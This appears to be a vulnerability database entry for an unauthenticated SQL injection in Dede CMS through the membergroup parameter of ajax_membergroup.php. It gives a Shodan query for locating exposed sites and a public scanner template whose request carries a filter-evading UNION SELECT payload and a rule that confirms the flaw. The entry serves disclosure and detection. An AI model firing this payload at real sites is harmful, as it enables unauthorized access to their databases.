漏洞描述
Dede CMS contains a SQL injection vulnerability which allows remote unauthenticated users to inject arbitrary SQL statements via the ajax_membergroup.php endpoint and the membergroup parameter.
shodan-query: http.html:"DedeCms"
dedecms-membergroup-sqli: Dede CMS - SQL Injection
PoC代码[已公开]
id: dedecms-membergroup-sqli
info:
name: Dede CMS - SQL Injection
author: pikpikcu
severity: critical
verified: true
description: |
Dede CMS contains a SQL injection vulnerability which allows remote unauthenticated users to inject arbitrary SQL statements via the ajax_membergroup.php endpoint and the membergroup parameter.
shodan-query: http.html:"DedeCms"
reference:
- http://www.dedeyuan.com/xueyuan/wenti/1244.html
set:
r1: randomInt(1000, 9999)
rules:
r0:
request:
method: GET
path: /member/ajax_membergroup.php?action=post&membergroup=@`'`/*!50000Union+*/+/*!50000select+*/+md5({{r1}})+--+@`'`
expression: response.status == 200 && response.body.bcontains(bytes(md5(string(r1))))
expression: r0()